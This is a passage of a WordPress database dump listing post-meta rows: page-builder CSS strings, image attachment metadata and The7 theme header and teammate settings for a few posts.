!important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(32611,4533,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1684201412150{margin-top: 100px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684272005765{margin-top: -25px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(32612,4534,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1684201412150{margin-top: 100px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684272005765{margin-top: -25px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1681902149314{margin-top: -25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(32613,4535,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1684201412150{margin-top: 100px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684272005765{margin-top: -25px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(32614,4536,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1684201412150{margin-top: 100px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684272005765{margin-top: -25px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1681902149314{margin-top: -25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(32621,4551,'_wp_attached_file','2023/05/image001.png'),
(32622,4551,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:635;s:6:\"height\";i:154;s:4:\"file\";s:20:\"2023/05/image001.png\";s:8:\"filesize\";i:113030;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"image001-300x73.png\";s:5:\"width\";i:300;s:6:\"height\";i:73;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27665;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"image001-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16010;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:20:\"image001-500x121.png\";s:5:\"width\";i:500;s:6:\"height\";i:121;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:67858;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(32636,4560,'_wp_attached_file','2023/05/Artboard-1.png'),
(32637,4560,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:627;s:6:\"height\";i:173;s:4:\"file\";s:22:\"2023/05/Artboard-1.png\";s:8:\"filesize\";i:17112;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"Artboard-1-300x83.png\";s:5:\"width\";i:300;s:6:\"height\";i:83;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15183;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Artboard-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7210;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:22:\"Artboard-1-500x138.png\";s:5:\"width\";i:500;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32094;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(32638,4578,'_edit_lock','1692387240:1'),
(32639,4579,'_wp_attached_file','2023/05/k1.jpg'),
(32640,4579,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:185;s:6:\"height\";i:231;s:4:\"file\";s:14:\"2023/05/k1.jpg\";s:8:\"filesize\";i:52451;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"k1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5862;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(32641,4580,'_wp_attached_file','2023/05/k2.jpg'),
(32642,4580,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:185;s:6:\"height\";i:231;s:4:\"file\";s:14:\"2023/05/k2.jpg\";s:8:\"filesize\";i:40945;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"k2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4653;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(32643,4581,'_wp_attached_file','2023/05/k3.jpg'),
(32644,4581,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:185;s:6:\"height\";i:231;s:4:\"file\";s:14:\"2023/05/k3.jpg\";s:8:\"filesize\";i:37365;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"k3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3927;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(32645,4578,'_thumbnail_id','4579'),
(32646,4578,'_edit_last','1'),
(32647,4578,'_dt_sidebar_position','disabled'),
(32648,4578,'_dt_sidebar_widgetarea_id','sidebar_1'),
(32649,4578,'_dt_sidebar_hide_on_mobile','0'),
(32650,4578,'_dt_footer_show','1'),
(32651,4578,'_dt_footer_widgetarea_id','sidebar_2'),
(32652,4578,'_dt_footer_hide_on_mobile','0'),
(32653,4578,'_dt_header_title','fancy'),
(32654,4578,'_dt_header_background','normal'),
(32655,4578,'_dt_header_background_below_slideshow','disabled'),
(32656,4578,'_dt_header_transparent_bg_color_scheme','light'),
(32657,4578,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(32658,4578,'_dt_header_transparent_top_bar_bg_opacity','25'),
(32659,4578,'_dt_header_transparent_bg_color','#000000'),
(32660,4578,'_dt_header_transparent_bg_opacity','50'),
(32661,4578,'_dt_header_disabled_background','normal'),
(32662,4578,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(32663,4578,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(32664,4578,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(32665,4578,'_dt_header_disabled_transparent_bg_color','#000000'),
(32666,4578,'_dt_header_disabled_transparent_bg_opacity','50'),
(32667,4578,'_dt_page_overrides_top_margin',''),
(32668,4578,'_dt_page_overrides_right_margin',''),
(32669,4578,'_dt_page_overrides_bottom_margin',''),
(32670,4578,'_dt_page_overrides_left_margin',''),
(32671,4578,'_dt_mobile_page_padding_top',''),
(32672,4578,'_dt_mobile_page_padding_right',''),
(32673,4578,'_dt_mobile_page_padding_bottom',''),
(32674,4578,'_dt_mobile_page_padding_left',''),
(32675,4578,'_dt_fancy_header_layout_heading',''),
(32676,4578,'_dt_fancy_header_title_aligment','center'),
(32677,4578,'_dt_fancy_header_height','300'),
(32678,4578,'_dt_fancy_header_padding-top','0px'),
(32679,4578,'_dt_fancy_header_padding-bottom','0px'),
(32680,4578,'_dt_fancy_header_breadcrumbs_heading',''),
(32681,4578,'_dt_fancy_header_breadcrumbs','disabled'),
(32682,4578,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(32683,4578,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(32684,4578,'_dt_fancy_header_title_heading',''),
(32685,4578,'_dt_fancy_header_title_mode','generic'),
(32686,4578,'_dt_fancy_header_title',''),
(32687,4578,'_dt_fancy_header_title_font_size','30'),
(32688,4578,'_dt_fancy_header_title_line_height','36'),
(32689,4578,'_dt_fancy_header_text_transform','none'),
(32690,4578,'_dt_fancy_header_title_color_mode','color'),
(32691,4578,'_dt_fancy_header_title_color','#ffffff'),
(32692,4578,'_dt_fancy_header_subtitle_heading',''),
(32693,4578,'_dt_fancy_header_subtitle',''),
(32694,4578,'_dt_fancy_header_subtitle_font_size','18'),
(32695,4578,'_dt_fancy_header_subtitle_line_height','26'),
(32696,4578,'_dt_fancy_header_subtitle_text_transform','none'),
(32697,4578,'_dt_fancy_header_subtitle_color_mode','color'),
(32698,4578,'_dt_fancy_header_subtitle_color','#ffffff'),
(32699,4578,'_dt_fancy_header_bg_heading',''),
(32700,4578,'_dt_fancy_header_bg_color','#222222'),
(32701,4578,'_dt_fancy_header_bg_image_origin','custom'),
(32702,4578,'_dt_fancy_header_bg_image','a:0:{}'),
(32703,4578,'_dt_fancy_header_bg_repeat','no-repeat'),
(32704,4578,'_dt_fancy_header_bg_position_x','center'),
(32705,4578,'_dt_fancy_header_bg_position_y','center'),
(32706,4578,'_dt_fancy_header_bg_fullscreen','1'),
(32707,4578,'_dt_fancy_header_bg_overlay','0'),
(32708,4578,'_dt_fancy_header_overlay_color','#000'),
(32709,4578,'_dt_fancy_header_bg_overlay_opacity','50'),
(32710,4578,'_dt_fancy_header_scroll_effect','default'),
(32711,4578,'_dt_fancy_header_bg_parallax','0.5'),
(32712,4578,'_dt_fancy_header_responsiveness_heading',''),
(32713,4578,'_dt_fancy_header_responsiveness','disabled'),
(32714,4578,'_dt_fancy_header_responsiveness_switch','778px'),
(32715,4578,'_dt_fancy_header_responsive_height','70'),
(32716,4578,'_dt_fancy_header_responsive_font_size','30'),
(32717,4578,'_dt_fancy_header_responsive_title_line_height','38'),
(32718,4578,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(32719,4578,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(32720,4578,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(32721,4578,'_dt_teammate_options_go_to_single','1'),
(32722,4578,'_dt_teammate_options_position',''),
(32723,4578,'_dt_teammate_options_website',''),
(32724,4578,'_dt_teammate_options_mail',''),
(32725,4578,'_dt_teammate_options_facebook',''),
(32726,4578,'_dt_teammate_options_twitter',''),
(32727,4578,'_dt_teammate_options_dribbble',''),
(32728,4578,'_dt_teammate_options_you-tube',''),
(32729,4578,'_dt_teammate_options_rss',''),
(32730,4578,'_dt_teammate_options_delicious',''),
(32731,4578,'_dt_teammate_options_flickr',''),
(32732,4578,'_dt_teammate_options_lastfm',''),
(32733,4578,'_dt_teammate_options_linkedin',''),
(32734,4578,'_dt_teammate_options_vimeo',''),
(32735,4578,'_dt_teammate_options_tumbler',''),
(32736,4578,'_dt_teammate_options_pinterest',''),
(32737,4578,'_dt_teammate_options_devian',''),
(32738,4578,'_dt_teammate_options_skype',''),
(32739,4578,'_dt_teammate_options_github',''),
(32740,4578,'_dt_teammate_options_instagram',''),
(32741,4578,'_dt_teammate_options_stumbleupon',''),
(32742,4578,'_dt_teammate_options_behance',''),
(32743,4578,'_dt_teammate_options_px-500',''),
(32744,4578,'_dt_teammate_options_tripedvisor',''),
(32745,4578,'_dt_teammate_options_vk',''),
(32746,4578,'_dt_teammate_options_foursquare',''),
(32747,4578,'_dt_teammate_options_xing',''),
(32748,4578,'_dt_teammate_options_weibo',''),
(32749,4578,'_dt_teammate_options_odnoklassniki',''),
(32750,4578,'_dt_teammate_options_research-gate',''),
(32751,4578,'_dt_teammate_options_yelp',''),
(32752,4578,'_dt_teammate_options_blogger',''),
(32753,4578,'_dt_teammate_options_soundcloud',''),
(32754,4578,'_dt_teammate_options_viber',''),
(32755,4578,'_dt_teammate_options_whatsapp',''),
(32756,4578,'_dt_teammate_options_reddit',''),
(32757,4578,'_dt_teammate_options_snapchat',''),
(32758,4578,'_dt_teammate_options_telegram',''),
(32759,4578,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(32760,4582,'_edit_lock','1692386795:1'),
(32761,4582,'_thumbnail_id','4580'),
(32762,4582,'_edit_last','1'),
(32763,4582,'_dt_sidebar_position','disabled'),
(32764,4582,'_dt_sidebar_widgetarea_id','sidebar_1'),
(32765,4582,'_dt_sidebar_hide_on_mobile','0'),
(32766,4582,'_dt_footer_show','1'),
(32767,4582,'_dt_footer_widgetarea_id','sidebar_2'),
(32768,4582,'_dt_footer_hide_on_mobile','0'),
(32769,4582,'_dt_header_title','fancy'),
(32770,4582,'_dt_header_background','normal'),
(32771,4582,'_dt_header_background_below_slideshow','disabled'),
(32772,4582,'_dt_header_transparent_bg_color_scheme','light'),
(32773,4582,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(32774,4582,'_dt_header_transparent_top_bar_bg_opacity','25'),
(32775,4582,'_dt_header_transparent_bg_color','#000000'),
(32776,4582,'_dt_header_transparent_bg_opacity','50'),
(32777,4582,'_dt_header_disabled_background','normal'),
(32778,4582,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(32779,4582,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(32780,4582,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(32781,4582,'_dt_header_disabled_transparent_bg_color','#000000'),
(32782,4582,'_dt_header_disabled_transparent_bg_opacity','50'),
(32783,4582,'_dt_page_overrides_top_margin',''),
(32784,4582,'_dt_page_overrides_right_margin',''),
(32785,4582,'_dt_page_overrides_bottom_margin',''),
(32786,4582,'_dt_page_overrides_left_margin',''),
(32787,4582,'_dt_mobile_page_padding_top',''),
(32788,4582,'_dt_mobile_page_padding_right',''),
(32789,4582,'_dt_mobile_page_padding_bottom',''),
(32790,4582,'_dt_mobile_page_padding_left',''),
(32791,4582,'_dt_fancy_header_layout_heading',''),
(32792,4582,'_dt_fancy_header_title_aligment','center'),
(32793,4582,'_dt_fancy_header_height','300'),
(32794,4582,'_dt_fancy_header_padding-top','0px'),
(32795,4582,'_dt_fancy_header_padding-bottom','0px'),
(32796,4582,'_dt_fancy_header_breadcrumbs_heading',''),
(32797,4582,'_dt_fancy_header_breadcrumbs','disabled'),
(32798,4582,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(32799,4582,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(32800,4582,'_dt_fancy_header_title_heading',''),
(32801,4582,'_dt_fancy_header_title_mode','generic'),
(32802,4582,'_dt_fancy_header_title',''),
(32803,4582,'_dt_fancy_header_title_font_size','30'),
(32804,4582,'_dt_fancy_header_title_line_height','36'),
(32805,4582,'_dt_fancy_header_text_transform','none'),
(32806,4582,'_dt_fancy_header_title_color_mode','color'),
(32807,4582,'_dt_fancy_header_title_color','#ffffff'),
(32808,4582,'_dt_fancy_header_subtitle_heading',''),
(32809,4582,'_dt_fancy_header_subtitle',''),
(32810,4582,'_dt_fancy_header_subtitle_font_size','18'),
(32811,4582,'_dt_fancy_header_subtitle_line_height','26'),
(32812,4582,'_dt_fancy_header_subtitle_text_transform','none'),
(32813,4582,'_dt_fancy_header_subtitle_color_mode','color'),
(32814,4582,'_dt_fancy_header_subtitle_color','#ffffff'),
(32815,4582,'_dt_fancy_header_bg_heading',''),
(32816,4582,'_dt_fancy_header_bg_color','#222222'),
(32817,4582,'_dt_fancy_header_bg_image_origin','custom'),
(32818,4582,'_dt_fancy_header_bg_image','a:0:{}'),
(32819,4582,'_dt_fancy_header_bg_repeat','no-repeat'),
(32820,4582,'_dt_fancy_header_bg_position_x','center'),
(32821,4582,'_dt_fancy_header_bg_position_y','center'),
(32822,4582,'_dt_fancy_header_bg_fullscreen','1'),
(32823,4582,'_dt_fancy_header_bg_overlay','0'),
(32824,4582,'_dt_fancy_header_overlay_color','#000'),
(32825,4582,'_dt_fancy_header_bg_overlay_opacity','50'),
(32826,4582,'_dt_fancy_header_scroll_effect','default'),
(32827,4582,'_dt_fancy_header_bg_parallax','0.5'),
(32828,4582,'_dt_fancy_header_responsiveness_heading',''),
(32829,4582,'_dt_fancy_header_responsiveness','disabled'),
(32830,4582,'_dt_fancy_header_responsiveness_switch','778px'),
(32831,4582,'_dt_fancy_header_responsive_height','70'),
(32832,4582,'_dt_fancy_header_responsive_font_size','30'),
(32833,4582,'_dt_fancy_header_responsive_title_line_height','38'),
(32834,4582,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(32835,4582,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(32836,4582,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(32837,4582,'_dt_teammate_options_go_to_single','1'),
(32838,4582,'_dt_teammate_options_position',''),
(32839,4582,'_dt_teammate_options_website',''),
(32840,4582,'_dt_teammate_options_mail',''),
(32841,4582,'_dt_teammate_options_facebook',''),
(32842,4582,'_dt_teammate_options_twitter',''),
(32843,4582,'_dt_teammate_options_dribbble',''),
(32844,4582,'_dt_teammate_options_you-tube',''),
(32845,4582,'_dt_teammate_options_rss',''),
(32846,4582,'_dt_teammate_options_delicious',''),
